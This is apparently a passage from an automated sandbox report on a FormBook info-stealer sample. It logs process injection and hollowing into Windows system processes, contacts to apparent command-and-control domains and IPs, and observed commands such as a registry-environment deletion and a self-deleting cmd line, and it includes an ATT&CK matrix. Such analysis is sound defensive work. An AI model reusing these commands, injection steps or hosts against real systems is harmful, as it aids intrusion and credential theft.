          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A38A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04969240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04977E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04977E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04977E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04977E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04977E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04977E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0498AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A35BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04971B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04971B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A1D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A2138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_049FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0499E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04964F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04964F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A2131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A38F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04993B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04993B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0496DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_0497FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exeCode function: 4_2_04A38B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CAF0F0 push dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CAF120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 16_3_02CAE480 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CAF0F0 push dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CAF120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02CAE480 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02D782E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02D78F80 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exeCode function: 19_3_02D78F50 push dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0313FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0313FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0317070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0317070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03178B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03178F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03127794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03127794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03127794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0315D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0316138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03175BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_031253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030CDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030B8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030D8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030C3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030A5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_03161608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030E4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_0315FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mshta.exeCode function: 26_2_030AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\logagent.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\mshta.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\secinit.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Domain query: www.kilbyrnefarm.com
          Source: C:\Windows\explorer.exe Domain query: www.delhibudokankarate.com
          Source: C:\Windows\explorer.exe Domain query: www.f9fui8.xyz
          Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exe Network Connect: 34.98.99.30 80
          Source: C:\Windows\explorer.exe Domain query: www.trendyheld.com
          Source: C:\Windows\explorer.exe Domain query: www.besport24.com
          Source: C:\Windows\explorer.exe Domain query: www.mobiessence.com
          Source: C:\Windows\explorer.exe Network Connect: 64.190.62.111 80
          Source: C:\Windows\explorer.exe Domain query: www.titanusedcarsworth.com
          Source: C:\Windows\explorer.exe Network Connect: 51.83.52.226 80
          Source: C:\Windows\explorer.exe Network Connect: 52.58.78.16 80
          Source: C:\Windows\explorer.exe Network Connect: 86.105.245.69 80
          Source: C:\Windows\explorer.exe Network Connect: 154.215.87.120 80
          Source: C:\Windows\explorer.exe Domain query: www.schoolfrontoffice.com
          Source: C:\Windows\explorer.exe Domain query: www.beastninjas.com
          Source: C:\Windows\explorer.exe Domain query: www.mylifeinpark.com
          Source: C:\Windows\explorer.exe Network Connect: 35.186.238.101 80
          Source: C:\Windows\explorer.exe Network Connect: 23.27.129.115 80
          Source: C:\Windows\explorer.exe Domain query: www.vavasoo.com
          Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe Domain query: www.opticatervisof.com
          Source: C:\Windows\explorer.exe Domain query: www.dragonshipping.com
          Source: C:\Windows\explorer.exe Domain query: www.mypursuitpodcast.com
          Source: C:\Windows\explorer.exe Domain query: www.importexportasia.com
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 10410000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 2750000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe Memory allocated: C:\Windows\SysWOW64\logagent.exe base: 2760000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory allocated: C:\Windows\SysWOW64\mshta.exe base: 10410000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory allocated: C:\Windows\SysWOW64\mshta.exe base: 2340000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory allocated: C:\Windows\SysWOW64\mshta.exe base: 2350000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 10410000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 3290000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory allocated: C:\Windows\SysWOW64\secinit.exe base: 32A0000 protect: page execute and read and write
          Creates a thread in another existing process (thread injection)
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2760000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Thread created: C:\Windows\SysWOW64\mshta.exe EIP: 2350000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Thread created: C:\Windows\SysWOW64\secinit.exe EIP: 32A0000
          Injects a PE file into foreign processes
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10410000 value starts with: 4D5A
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory written: C:\Windows\SysWOW64\mshta.exe base: 10410000 value starts with: 4D5A
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory written: C:\Windows\SysWOW64\secinit.exe base: 10410000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\logagent.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\mshta.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mshta.exe Section loaded: unknown target: C:\Windows\SysWOW64\reg.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mshta.exe Section loaded: unknown target: C:\Windows\SysWOW64\reg.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\logagent.exe Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\logagent.exe Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\mshta.exe Thread register set: target process: 3440
          Source: C:\Windows\SysWOW64\rundll32.exe Thread register set: target process: 3440
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\logagent.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Windows\SysWOW64\logagent.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 260000
          Source: C:\Windows\SysWOW64\mshta.exe Section unmapped: C:\Windows\SysWOW64\reg.exe base address: CE0000
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 10410000
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2750000
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe Memory written: C:\Windows\SysWOW64\logagent.exe base: 2760000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory written: C:\Windows\SysWOW64\mshta.exe base: 10410000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory written: C:\Windows\SysWOW64\mshta.exe base: 2340000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory written: C:\Windows\SysWOW64\mshta.exe base: 2350000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory written: C:\Windows\SysWOW64\secinit.exe base: 10410000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory written: C:\Windows\SysWOW64\secinit.exe base: 3290000
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Memory written: C:\Windows\SysWOW64\secinit.exe base: 32A0000
          Source: C:\Users\user\Desktop\Form_TT_EUR57,890.exe Process created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exe
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Process created: C:\Windows\SysWOW64\mshta.exe C:\Windows\System32\mshta.exe
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Process created: C:\Windows\SysWOW64\secinit.exe C:\Windows\System32\secinit.exe
          Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\mshta.exe'
          Source: explorer.exe, 00000008.00000000.413574464.00000000083E7000.00000004.00000001.sdmp, rundll32.exe, 0000001C.00000002.863617047.0000000003540000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000000.464624457.00000000008B8000.00000004.00000020.sdmp, rundll32.exe, 0000001C.00000002.863617047.0000000003540000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.387156048.0000000000EE0000.00000002.00000001.sdmp, rundll32.exe, 0000001C.00000002.863617047.0000000003540000.00000002.00000001.sdmp Binary or memory string: &Program Manager
          Source: explorer.exe, 00000008.00000000.387156048.0000000000EE0000.00000002.00000001.sdmp, rundll32.exe, 0000001C.00000002.863617047.0000000003540000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\Public\Libraries\Fdhlajk\Fdhlajk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 4.0.logagent.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.logagent.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 29.2.secinit.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara match File source: 26.0.mshta.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.2.logagent.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 26.2.mshta.exe.10410000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 29.0.secinit.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 26.0.mshta.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 29.0.secinit.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 29.2.secinit.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 26.2.mshta.exe.10410000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 4.0.logagent.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0000001D.00000000.493724351.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000001C.00000002.861918517.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000001A.00000002.495868043.0000000002910000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000001A.00000002.496343429.0000000002C80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000001C.00000002.863420934.0000000002DD0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000001A.00000000.467594845.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000001D.00000002.505021347.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.513499123.0000000004600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000001C.00000002.862165299.0000000000CB0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000001A.00000002.497909086.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000023.00000002.512339844.0000000002940000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000000.380848795.0000000010410000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.512824544.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.515478166.0000000010410000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook

          Mitre Att&ck Matrix

          Digits in parentheses are the superscript counts attached to each technique in the original matrix.

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Scripting (1) | Registry Run Keys / Startup Folder (1) | Process Injection (912) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (221) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules (1) | DLL Side-Loading (1) | Registry Run Keys / Startup Folder (1) | Modify Registry (1) | LSASS Memory | Virtualization/Sandbox Evasion (2) | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (2) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (912) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (2) | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (1) | LSA Secrets | System Network Configuration Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting (1) | Cached Domain Credentials | System Network Connections Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information (3) | DCSync | System Information Discovery (112) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Rundll32 (1) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Software Packing (1) | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | DLL Side-Loading (1) | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

          Behavior Graph

          [Interactive behavior graph; the recoverable information is given below as text.]
          Behavior Graph ID: 458655. Sample: Form_TT_EUR57,890.exe. Startdate: 03/08/2021. Architecture: WINDOWS. Score: 100.
          Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures.

          Process tree recovered from the graph (node numbers as in the graph):

          10 Form_TT_EUR57,890.exe (started)
